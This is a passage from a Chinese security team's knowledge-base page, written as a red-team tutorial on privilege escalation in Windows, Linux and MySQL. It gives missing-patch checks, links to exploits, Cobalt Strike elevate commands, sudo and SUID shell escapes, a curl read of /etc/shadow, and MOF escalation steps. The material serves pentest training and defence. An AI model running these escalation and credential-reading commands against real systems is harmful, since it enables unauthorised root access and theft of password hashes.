<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>权限提升 | 狼组安全团队公开知识库</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="致力于打造信息安全乌托邦">
    <meta name="referrer" content="never">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="preload" href="/assets/css/0.styles.32ca519c.css" as="style"><link rel="preload" href="/assets/js/app.f7464420.js" as="script"><link rel="preload" href="/assets/js/2.26207483.js" as="script"><link rel="preload" href="/assets/js/61.cd1e3b10.js" as="script"><link rel="prefetch" href="/assets/js/10.55514509.js"><link rel="prefetch" href="/assets/js/11.ec576042.js"><link rel="prefetch" href="/assets/js/12.a5584a2f.js"><link rel="prefetch" href="/assets/js/13.c9f84b2e.js"><link rel="prefetch" href="/assets/js/14.d2a5440c.js"><link rel="prefetch" href="/assets/js/15.2f271296.js"><link rel="prefetch" href="/assets/js/16.0895ce42.js"><link rel="prefetch" href="/assets/js/17.627e2976.js"><link rel="prefetch" href="/assets/js/18.73745a4c.js"><link rel="prefetch" href="/assets/js/19.19350186.js"><link rel="prefetch" href="/assets/js/20.e4eac589.js"><link rel="prefetch" href="/assets/js/21.fc0657ba.js"><link rel="prefetch" href="/assets/js/22.f4a1220f.js"><link rel="prefetch" href="/assets/js/23.c8cce92d.js"><link rel="prefetch" href="/assets/js/24.46225ec2.js"><link rel="prefetch" href="/assets/js/25.9b6d75e4.js"><link rel="prefetch" href="/assets/js/26.288f535e.js"><link rel="prefetch" href="/assets/js/27.865bdc75.js"><link rel="prefetch" href="/assets/js/28.f4224fef.js"><link rel="prefetch" href="/assets/js/29.6393a40b.js"><link rel="prefetch" href="/assets/js/3.a509f503.js"><link rel="prefetch" href="/assets/js/30.d5a49f97.js"><link rel="prefetch" href="/assets/js/31.eb3647df.js"><link rel="prefetch" href="/assets/js/32.7f48a571.js"><link rel="prefetch" href="/assets/js/33.1f374ffa.js"><link rel="prefetch" href="/assets/js/34.5a911179.js"><link rel="prefetch" href="/assets/js/35.d2bcc7ef.js"><link rel="prefetch" href="/assets/js/36.42e440bd.js"><link rel="prefetch" href="/assets/js/37.dedbbdea.js"><link rel="prefetch" href="/assets/js/38.d68d1f69.js"><link rel="prefetch" href="/assets/js/39.e278f860.js"><link rel="prefetch" href="/assets/js/4.35636da8.js"><link rel="prefetch" href="/assets/js/40.97f4e937.js"><link rel="prefetch" href="/assets/js/41.38630688.js"><link rel="prefetch" href="/assets/js/42.cae56aa5.js"><link rel="prefetch" href="/assets/js/43.61a04b16.js"><link rel="prefetch" href="/assets/js/44.5c6230f2.js"><link rel="prefetch" href="/assets/js/45.0f1355ae.js"><link rel="prefetch" href="/assets/js/46.c1906649.js"><link rel="prefetch" href="/assets/js/47.7ae220ce.js"><link rel="prefetch" href="/assets/js/48.59af224e.js"><link rel="prefetch" href="/assets/js/49.6a33a171.js"><link rel="prefetch" href="/assets/js/5.08ab40ee.js"><link rel="prefetch" href="/assets/js/50.f14601d2.js"><link rel="prefetch" href="/assets/js/51.f20841fd.js"><link rel="prefetch" href="/assets/js/52.fb0a5327.js"><link rel="prefetch" href="/assets/js/53.8013048c.js"><link rel="prefetch" href="/assets/js/54.d132c2f8.js"><link rel="prefetch" href="/assets/js/55.87aa8b5d.js"><link rel="prefetch" href="/assets/js/56.161f38ad.js"><link rel="prefetch" href="/assets/js/57.bd6a2ef2.js"><link rel="prefetch" href="/assets/js/58.8a69f15a.js"><link rel="prefetch" href="/assets/js/59.93c0e2de.js"><link rel="prefetch" href="/assets/js/6.fda5ce3a.js"><link rel="prefetch" href="/assets/js/60.10091d44.js"><link rel="prefetch" href="/assets/js/62.9c0ad8c5.js"><link rel="prefetch" href="/assets/js/63.4a8dd9d2.js"><link rel="prefetch" href="/assets/js/64.6bf3fede.js"><link rel="prefetch" href="/assets/js/65.7a2ccc50.js"><link rel="prefetch" href="/assets/js/66.874d563b.js"><link rel="prefetch" href="/assets/js/67.bb86eab2.js"><link rel="prefetch" href="/assets/js/68.c1db2a2b.js"><link rel="prefetch" href="/assets/js/69.8141480b.js"><link rel="prefetch" href="/assets/js/7.d1fe6bef.js"><link rel="prefetch" href="/assets/js/70.9fb74c80.js"><link rel="prefetch" href="/assets/js/71.d1e4e9ab.js"><link rel="prefetch" href="/assets/js/72.e6bf83fb.js"><link rel="prefetch" href="/assets/js/73.6dd6c980.js"><link rel="prefetch" href="/assets/js/74.3612ba47.js"><link rel="prefetch" href="/assets/js/75.6e1a2434.js"><link rel="prefetch" href="/assets/js/76.5bfa4bcc.js"><link rel="prefetch" href="/assets/js/77.784df031.js"><link rel="prefetch" href="/assets/js/78.aa94a0a0.js"><link rel="prefetch" href="/assets/js/79.c4e9a4f2.js"><link rel="prefetch" href="/assets/js/8.63fd05d7.js"><link rel="prefetch" href="/assets/js/80.8d47d1f7.js"><link rel="prefetch" href="/assets/js/81.1160b022.js"><link rel="prefetch" href="/assets/js/82.7d17e5c8.js"><link rel="prefetch" href="/assets/js/83.a2ff144a.js"><link rel="prefetch" href="/assets/js/84.53d29383.js"><link rel="prefetch" href="/assets/js/9.b49161a4.js">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="ant-row"><div class="nav-button"><i aria-label="icon: bars" class="anticon anticon-bars"><svg viewBox="0 0 1024 1024" focusable="false" data-icon="bars" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M912 192H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zM104 228a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0z"></path></svg></i> <span></span></div> <div class="ant-col ant-col-xs-24 ant-col-sm-24 ant-col-md-6 ant-col-lg-5 ant-col-xl-5 ant-col-xxl-4"><a href="/" class="router-link-active home-link"><img src="/assets/logo.svg" alt="狼组安全团队公开知识库" class="logo"> <span class="site-name">狼组安全团队公开知识库</span></a> <div class="search-box mobile-search"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div></div> <div class="ant-col ant-col-xs-0 ant-col-sm-0 ant-col-md-18 ant-col-lg-19 ant-col-xl-19 ant-col-xxl-20"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><ul role="menu" id="nav" class="ant-menu ant-menu-horizontal ant-menu-root ant-menu-light"><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/" class="router-link-active">
          首页
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/guide/">
          使用指南
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/knowledge/" class="router-link-active">
          知识库
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/opensource/">
          开源项目
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="visibility:hidden;position:absolute;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li></ul> <a href="https://github.com/wgpsec" target="_blank" rel="noopener noreferrer" class="repo-link"><i aria-label="icon: github" class="anticon anticon-github"><svg viewBox="64 64 896 896" focusable="false" data-icon="github" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M511.6 76.3C264.3 76.2 64 276.4 64 523.5 64 718.9 189.3 885 363.8 946c23.5 5.9 19.9-10.8 19.9-22.2v-77.5c-135.7 15.9-141.2-73.9-150.3-88.9C215 726 171.5 718 184.5 703c30.9-15.9 62.4 4 98.9 57.9 26.4 39.1 77.9 32.5 104 26 5.7-23.5 17.9-44.5 34.7-60.8-140.6-25.2-199.2-111-199.2-213 0-49.5 16.3-95 48.3-131.7-20.4-60.5 1.9-112.3 4.9-120 58.1-5.2 118.5 41.6 123.2 45.3 33-8.9 70.7-13.6 112.9-13.6 42.4 0 80.2 4.9 113.5 13.9 11.3-8.6 67.3-48.8 121.3-43.9 2.9 7.7 24.7 58.3 5.5 118 32.4 36.8 48.9 82.7 48.9 132.3 0 102.2-59 188.1-200 212.9a127.5 127.5 0 0 1 38.1 91v112.5c.8 9 0 17.9 15 17.9 177.1-59.7 304.6-227 304.6-424.1 0-247.2-200.4-447.3-447.5-447.3z"></path></svg></i></a></nav></div></div> <!----></header> <aside class="sidebar"><div><div class="promo"><div id="promo_3"><div class="promo_title">赞助商</div> <button type="button" class="ant-btn ant-btn-primary ant-btn-background-ghost"><span>成为赞助商</span></button></div></div> <div role="separator" id="reset-margin" class="ant-divider ant-divider-horizontal ant-divider-dashed"></div></div> <ul class="sidebar-links"><li><a href="/knowledge/" aria-current="page" title="知识库广告位招租" class="sidebar-link">知识库广告位招租</a></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>CTF</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>基础知识</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>工具手册</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>Web安全</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading open"><span>攻防对抗</span> <span class="arrow down"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/knowledge/hw/" aria-current="page" title="分类简介" class="sidebar-link">分类简介</a></li><li><a href="/knowledge/hw/border-info.html" title="互联网边界打点" class="sidebar-link">互联网边界打点</a></li><li><a href="/knowledge/hw/agent.html" title="构建通道漫游内网" class="sidebar-link">构建通道漫游内网</a></li><li><a href="/knowledge/hw/host-survival-domain.html" title="域内主机存活探测" class="sidebar-link">域内主机存活探测</a></li><li><a href="/knowledge/hw/intradomain-port.html" title="域内主机端口探测方法" class="sidebar-link">域内主机端口探测方法</a></li><li><a href="/knowledge/hw/to-root.html" aria-current="page" title="权限提升" class="active sidebar-link">权限提升</a></li><li><a href="/knowledge/hw/hold-root.html" title="权限维持" class="sidebar-link">权限维持</a></li><li><a href="/knowledge/hw/transverse.html" title="内网横向移动技巧" class="sidebar-link">内网横向移动技巧</a></li><li><a href="/knowledge/hw/log-action.html" title="日志处理" class="sidebar-link">日志处理</a></li><li><a href="/knowledge/hw/2020-defend-tips.html" title="【防守方】2020攻防演练防守心得" class="sidebar-link">【防守方】2020攻防演练防守心得</a></li><li><a href="/knowledge/hw/windows-emergency-response.html" title="【防守方】Windows应急响应" class="sidebar-link">【防守方】Windows应急响应</a></li><li><a href="/knowledge/hw/linux-emergency-response.html" title="【防守方】Linux应急响应" class="sidebar-link">【防守方】Linux应急响应</a></li><li><a href="/knowledge/hw/kill-webshell.html" title="【防守方】Webshell排查" class="sidebar-link">【防守方】Webshell排查</a></li><li><a href="/knowledge/hw/purple-team.html" title="【裁判方】紫队视角看2020年络网络攻防实战演习" class="sidebar-link">【裁判方】紫队视角看2020年络网络攻防实战演习</a></li></ul></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>代码审计</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li></ul></aside> <main class="page"> <div class="theme-antdocs-content content__default"><h2 id="提权的基础概念">提权的基础概念 <a href="#提权的基础概念" class="header-anchor">#</a></h2> <p><strong>Windows上常见的权限分类：</strong></p> <blockquote><p>User：普通用户权限；</p> <p>Administrator：管理员权限；</p> <p>System：系统权限。</p></blockquote> <p><strong>Linux上权限分类：</strong></p> <blockquote><p>User：普通用户权限；</p> <p>www-data：Web服务的权限，比User还要低，一般通过Web漏洞获取的Webshell就是这个权限；</p> <p>root：Linux系统最高权限。</p></blockquote> <p><strong>纵向提权</strong>：低权限角色获取高权限角色的权限。</p> <p><strong>横向提权</strong>：在系统A中获取了系统B中同级别的角色权限。</p> <p><strong>常用的提权方法</strong>：</p> <p>系统内核溢出漏洞提权、服务器中间件漏洞提权、数据库提权、其它第三方组件提权（利用率较高）。</p> <p>利用windows系统错误配置提权（可信服务路径漏洞，组策略首选项等）</p> <h2 id="windows提权">Windows提权 <a href="#windows提权" class="header-anchor">#</a></h2> <p><strong>LOLBAS</strong>（计划任务、文件传输、本地提权） https://lolbas-project.github.io/</p> <h3 id="内核漏洞提权">内核漏洞提权 <a href="#内核漏洞提权" class="header-anchor">#</a></h3> <table><thead><tr><th style="text-align:left;">漏洞代号</th> <th style="text-align:left;">补丁编号</th> <th style="text-align:left;">适用平台</th> <th style="text-align:left;">用途</th></tr></thead> <tbody><tr><td style="text-align:left;">MS14-058</td> <td style="text-align:left;">KB3000061</td> <td style="text-align:left;">03，08，12，Win7</td> <td style="text-align:left;">本地提权</td></tr> <tr><td style="text-align:left;">MS14-068</td> <td style="text-align:left;">KB3011780</td> <td style="text-align:left;">域控未安装补丁的域内，03，08，12</td> <td style="text-align:left;">域内提权</td></tr> <tr><td style="text-align:left;">MS15-051</td> <td style="text-align:left;">KB3057191</td> <td style="text-align:left;">03，08，12，Win7</td> <td style="text-align:left;">本地提权</td></tr> <tr><td style="text-align:left;">MS16-032</td> <td style="text-align:left;">KB3143141</td> <td style="text-align:left;">08 r2以后，12，Win7</td> <td style="text-align:left;">本地提权</td></tr> <tr><td style="text-align:left;">MS17-010</td> <td style="text-align:left;">KB4013389</td> <td style="text-align:left;">03，08，12，16，win7</td> <td style="text-align:left;">远程注入dll</td></tr> <tr><td style="text-align:left;">CVE-2020-0787</td> <td style="text-align:left;"></td> <td style="text-align:left;">all</td> <td style="text-align:left;">windows全版本提权</td></tr> <tr><td style="text-align:left;">CVE-2020-1472</td> <td style="text-align:left;"></td> <td style="text-align:left;">domain</td> <td style="text-align:left;">域内提权</td></tr></tbody></table> <p><strong>快速检测目标系统未打漏洞补丁</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>systeminfo <span class="token operator">&gt;</span> temp.txt<span class="token operator">&amp;</span><span class="token punctuation">(</span>for %i <span class="token keyword">in</span> <span class="token punctuation">(</span>KB3000061 KB3011780 KB3057191 KB3143141 KB4013389<span class="token punctuation">)</span> <span class="token keyword">do</span> @type temp.txt<span class="token operator">|</span>@find /i  <span class="token string">&quot;%i&quot;</span><span class="token operator">||</span> @echo %i Not Installed<span class="token operator">!</span><span class="token punctuation">)</span><span class="token operator">&amp;</span>del /f /q /a temp.txt
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>补丁号根据自己需求加，利用MSF<code>中有相关EXP或者自行搜索 Github，searchsploit</code></p> <p><strong>CVE-2020-0787</strong></p> <p>直接下载EXP到目标主机上执行（需要上桌面，会弹出一个system权限的cmd窗口）</p> <p>https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION</p> <p><strong>CVE-2020-1472</strong></p> <p>POC：https://github.com/dirkjanm/CVE-2020-1472</p> <p>Test-EXP：https://github.com/SecuraBV/CVE-2020-1472/</p> <p>推荐把py打包成exe使用，虽然体积大点但是比装py环境方便</p> <h3 id="利用cobalt-strike提权">利用Cobalt Strike提权 <a href="#利用cobalt-strike提权" class="header-anchor">#</a></h3> <p>Cobalt Strike 附带了一些绕过 <code>UAC</code> 的攻击，但如果当前用户不是管理员(Administrator)， 攻击会失效。</p> <p>Beacon默认回连时间（心跳时间）为60秒，为了更快的渗透修改成0秒，交互模式。</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">sleep</span> <span class="token number">0</span>	
<span class="token comment">#心跳时间设快了容易被发现，实际攻击不建议设太快</span>

shell <span class="token function">whoami</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p><strong>1、如果你有一个Administrator权限的Beacon，用以下命令提升到SYSTEM权限：</strong></p> <p>这个需要创建服务</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>elevate svc-exe test1（你的监听器）
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>2、如果你是普通<code>本地</code>用户权限，用以下命令提升到高权限</strong></p> <p>注意：如果是<code>域</code>用户会弹出认证窗口，不能提权</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>elevate uac-token-duplication test1
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>然后可以用上边的<code>svc-exe</code>再提权到SYSTEM</p> <h3 id="c-版的烂土豆-来自qax零队">C#版的烂土豆（来自QAX零队） <a href="#c-版的烂土豆-来自qax零队" class="header-anchor">#</a></h3> <p>实测Win7、Win8、08、12等可用</p> <p>项目地址：https://github.com/uknowsec/SweetPotato</p> <p>直接在Webshell下执行</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>SweetPotato.exe -a <span class="token function">whoami</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h2 id="linux提权">Linux提权 <a href="#linux提权" class="header-anchor">#</a></h2> <p><strong>GTFOBins</strong>（sudo滥用和SUID提权命令查询）https://gtfobins.github.io/</p> <h3 id="密码复用">密码复用 <a href="#密码复用" class="header-anchor">#</a></h3> <p>如数据库、后台 web 密码，可能就是 root 密码</p> <h3 id="内核溢出漏洞提权">内核溢出漏洞提权 <a href="#内核溢出漏洞提权" class="header-anchor">#</a></h3> <p>1、信息收集</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">uname</span> -a	<span class="token comment">#查看系统版本内核信息</span>

<span class="token comment">#centos</span>
hostnamectl	<span class="token comment">#查看系统版本内核详细信息，推荐这个命令</span>

<span class="token comment">#ubuntu</span>
lsb_release -a
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p>2、使用 <code>searchsploit</code> 查找相关内核漏洞</p> <p>下载地址：https://github.com/offensive-security/exploitdb</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>searchsploit linux <span class="token number">3.10</span> CentOS Linux <span class="token number">7</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>例如经典的<strong>脏牛提权</strong>~可以用Vulnhub的lampiao这个靶机去做实验</p> <p>下载脏牛：https://github.com/gbonacini/CVE-2016-5195</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>./dcow -s
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>问题记录：</p> <p>Win10子系统的 g++编译环境安装一直报错，最终发现 Ubuntu 20.04.1 LTS 版本跟apt源不匹配，使用最新的阿里源即可
编译好后又报错cannot execute binary file: Exec format error，原因是系统版本和g++版本差异造成的，将源码上传到目标系统编译执行，成功执行</p> <h3 id="sudo滥用">sudo滥用 <a href="#sudo滥用" class="header-anchor">#</a></h3> <p><code>/etc/sudoers</code>文件定义可以执行 sudo 的账户、定义某个应用程序用 root 访问、是否需要密码验证</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">sudo</span> -l	<span class="token comment">#查看当前用户可以sudo的程序</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>AWK：</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">sudo</span> <span class="token function">awk</span> <span class="token string">'BEGIN {system(&quot;/bin/sh&quot;)}'</span>	
<span class="token comment">#通过生成交互式系统外Shell来脱离受限环境，需要普通用户的密码</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>CURL：</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">sudo</span> <span class="token function">curl</span> file:///etc/shadow
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h3 id="suid提权">SUID提权 <a href="#suid提权" class="header-anchor">#</a></h3> <p>SUID 是一种特殊的文件属性，它允许用户执行的文件以该文件的拥有者的身份运行</p> <p>【ls 查看时有 s 属性才支持 SUID】</p> <p>1、查找正在系统上运行的所有SUID可执行文件</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">find</span> / -user root -perm -4000 -print <span class="token operator"><span class="token file-descriptor important">2</span>&gt;</span>/dev/null
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>2、比如发现了find</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#随便新建一个文件，或利用已有文件</span>
<span class="token function">touch</span> abc

<span class="token comment">#以SUID即root权限执行命令</span>
<span class="token function">find</span> abc -exec whomai <span class="token punctuation">\</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>3、例子 {nmap SUID提权}</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#2.02 to 5.21版本 用交互模式执行shell命令</span>

<span class="token function">sudo</span> nmap --interactive		
nmap<span class="token operator">&gt;</span> <span class="token operator">!</span>sh
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><h3 id="su-root被禁止登录-获取交互shell">su root被禁止登录（获取交互shell） <a href="#su-root被禁止登录-获取交互shell" class="header-anchor">#</a></h3> <blockquote><p>拿到 root 密码，端口转发，代理，但防火墙禁止其他人登录 root；</p> <p>用原来的低权限 shell，也无法 sudo 切换 root</p> <p>因为出于安全考虑，linux 要求用户必须从终端设备（tty）中输入密码，而不是标准输入（stdin）</p> <p>所以 sudo 在你输入密码的时候本质上是读取了键盘，而不是读取 bash 里面输入的字符</p></blockquote> <p><strong>利用python获取交互Shell</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>python -c <span class="token string">'import pty;pty.spawn(&quot;/bin/sh&quot;)'</span>
<span class="token function">sudo</span> <span class="token function">su</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><h2 id="数据库提权">数据库提权 <a href="#数据库提权" class="header-anchor">#</a></h2> <p>以下数据库提权方法 <code>server 2003</code>之前的系统才可用</p> <h3 id="mysql数据库提权">MySQL数据库提权 <a href="#mysql数据库提权" class="header-anchor">#</a></h3> <p><strong>MOF提权</strong></p> <p>MOF文件是mysql数据库的扩展文件（在c:/windows/system32/wbem/mof/nullevt.mof）</p> <p>叫做”托管对象格式”，其作用是每隔五秒就会去监控进程创建和死亡</p> <p><strong>利用条件：</strong></p> <blockquote><p><code>Windows&lt;=2003</code></p> <p>mysql在c:/windows/system32/wbem/mof目录有写权限</p> <p>已知数据库root账号密码</p> <p>数据库允许外连</p> <p>secure_file_priv为空</p></blockquote> <p>当<code>secure_file_priv</code>的值没有具体值时，表示不对<code>MySQL</code>的导入|导出做限制，如果是null，表示<code>MySQL</code>不允许导入导出</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#查看secure_file_priv的值</span>
SHOW VARIABLES LIKE <span class="token string">&quot;secure_file_priv&quot;</span><span class="token punctuation">;</span>

<span class="token comment">#这个值可以在my.ini设置为空</span>
secure_file_priv <span class="token operator">=</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><strong>提权原理：</strong></p> <blockquote><p>MOF文件既然每五秒就会执行，而且是系统权限；</p> <p>我们通过mysql将文件写入一个MOF文件替换掉原有的MOF文件；</p> <p>然后系统每隔五秒就会执行一次我们上传的MOF。</p> <p>MOF当中有一段是vbs脚本，我们可以通过控制这段vbs脚本的内容让系统执行命令，进行提权。</p></blockquote> <p>这个提权方式条件非常严苛，数据库在system32写文件这个条件一般很难达到，而且较新的系统无法使用MOF提权。</p> <p><strong>MSF 下有Mof 提权模块</strong></p> <p>执行成功后会直接反弹一个 <code>system</code>权限的meterpreter 。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>use exploit/windows/mysql/mysql_mof
